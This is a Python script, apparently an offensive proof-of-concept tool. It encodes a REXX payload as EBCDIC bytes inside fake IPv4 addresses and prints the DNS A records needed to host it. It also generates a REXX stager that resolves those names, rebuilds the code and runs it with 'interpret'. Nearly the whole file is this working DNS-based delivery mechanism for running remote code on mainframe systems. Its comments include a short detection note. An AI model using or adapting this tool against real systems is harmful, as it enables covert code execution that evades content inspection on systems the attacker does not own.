#!/usr/bin/python
import socket
import sys, time
import struct
import argparse
# Banner text reused as the argparse description (RawDescriptionHelpFormatter
# keeps its line layout) and printed again at start-up.
header = '''
___ _______ ___ _______ __ _ _______ __ __ _______
| | | || | | _ || | | || || | | || |
| | | ___|| | | |_| || |_| ||_ _|| | | || _____|
| | | |___ | | | || | | | | |_| || |_____
| |___ | ___|| |___ | || _ | | | | ||_____ |
| || |___ | || _ || | | | | | | | _____| |
|_______||_______||_______||__| |__||_| |__| |___| |_______||_______|
Appearances are a glimpse of the unseen...
'''
# Command line: -tld and -infile are mandatory; --realdns is an opt-in flag
# whose own help text marks it as "very alpha".
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description=header)
parser.add_argument("--realdns", help="Set if you want to use existing DNS entries (very alpha)", action='store_true')
parser.add_argument("-tld", help="TLD for generated dns-entries", required=True)
parser.add_argument('-infile', help="The REXX payload you want to store in DNS", required=True)
args = parser.parse_args()
# Whole input file is read into memory as text; the with-block closes the handle.
with open(args.infile) as code_stream:
    code = code_stream.read()
# Assigned here but never read in the code shown on this page (dead name).
charval = {}
def char2oct(someChar):
    '''Return the EBCDIC (code page 500) integer value of a 1-byte character.

    The character is encoded with ``cp500`` and the single resulting byte is
    read back as an unsigned 8-bit integer.  ``struct.error`` is raised when
    the encoding does not produce exactly one byte.
    '''
    encoded = someChar.encode('cp500')
    (value,) = struct.unpack('<B', encoded)
    return value
def b42ip(char4):
    '''Return dotted-decimal IPv4 text built from the first four characters of *char4*.

    Each character is mapped to its EBCDIC byte value with char2oct(), so the
    "address" is simply the four text bytes written as octets.  Raises
    IndexError when *char4* holds fewer than four characters.
    '''
    octets = tuple(char2oct(char4[i]) for i in range(4))
    return '%s.%s.%s.%s' % octets
def gendsn(domain):
    '''Return a hostname made of a random 7-character label under *domain*.

    The label is drawn from lowercase ASCII letters and digits with the
    ``random`` module; uniqueness across calls is not checked.
    '''
    import random
    import string
    alphabet = string.ascii_lowercase + string.digits
    label = ''.join(random.choice(alphabet) for _ in range(7))
    return label + "." + domain
# One entry per payload line; each entry is a list of [dns_name, dotted_ip] pairs
# in chunk order.
result = []
# dotted_ip -> dns_name already assigned to it, so identical 4-byte chunks
# share one DNS entry instead of getting a fresh random name each time.
toadd = {}
# Assigned but never read in the code shown on this page.
hostfile = []
print header
extra = " Generating REXX and DNS"
print extra
# Computed but never used in the code shown on this page.
total=len(code.split('\n'))
for loc in code.split('\n'):
    line = []
    done = 0  # never read
    # Right-pad with spaces until the line length is a multiple of 4 so it
    # splits into whole 4-character chunks (an empty line stays empty).
    is4 = len(loc) % 4
    while is4:
        loc += " "
        is4 = len(loc) % 4
    ips = [loc[i:i+4] for i in range(0, len(loc), 4)]
    for ip in ips:
        # o1..o4 are computed but never used; b42ip() repeats the same
        # conversion for the whole chunk.
        o1 = char2oct(ip[0])
        o2 = char2oct(ip[1])
        o3 = char2oct(ip[2])
        o4 = char2oct(ip[3])
        theip = b42ip(ip)
        if theip in toadd:
            dns = toadd[theip]
            line.append([dns, theip])
        else:
            if args.realdns:
                try:
                    # Reverse lookup of the synthetic address.  Nothing here
                    # verifies that the returned name forward-resolves back to
                    # theip, and the bare except also swallows
                    # KeyboardInterrupt/SystemExit rather than just
                    # socket.herror.
                    dns = socket.gethostbyaddr(theip)[0]
                except:
                    dns = gendsn(args.tld)
            else:
                dns = gendsn(args.tld)
            line.append([dns, theip])
            toadd[theip] = dns
    result.append(line)
# List the A records that must exist for the emitted script to work (name -> IPv4).
print "Required DNS entries:"
for line in result:
    for entry in line:
        print "%s -> %s" % (entry[0], entry[1])
# Now generate the REXX
# The emitted script rebuilds each payload line by resolving every name above
# (ip24b) and then runs the result with `interpret`, i.e. it executes whatever
# the resolver answers.  Detection note: the observable pattern is a burst of
# A lookups for 7-character lowercase/digit labels under one domain, followed
# by REXX `interpret` of the concatenated result.
print "-------_YOUR_REXX_SCRIPT-----------"
print ""
print "/* REXX */"
print "/* Proof of Concept */"
for a in result:
    print "cline = ''"
    for char4 in a:
        print "cline = cline || ip24b('"+char4[0]+"')"
    print "interpret cline"
print "exit 0"
# ip24b: GETHOSTBYNAME returns "RC address"; on RC = "0" the four octets are
# converted back to characters with d2c.  On any other RC, res stays "" and
# the procedure returns an empty string, so the caller's line is silently
# truncated rather than failing.
print '''
ip24b: procedure
parse arg dns
res = ""
src = socket("INITIALIZE","MYSET01");
a = socket("GETHOSTBYNAME", dns)
parse var a RC STUFF
if RC = "0" then do;
parse var STUFF oct1 "." oct2 "." oct3 "." oct4
res = res ||d2c(oct1)
res = res ||d2c(oct2)
res = res ||d2c(oct3)
res = res ||d2c(oct4)
end;
src = socket("TERMINATE","MYSET01");
return res
'''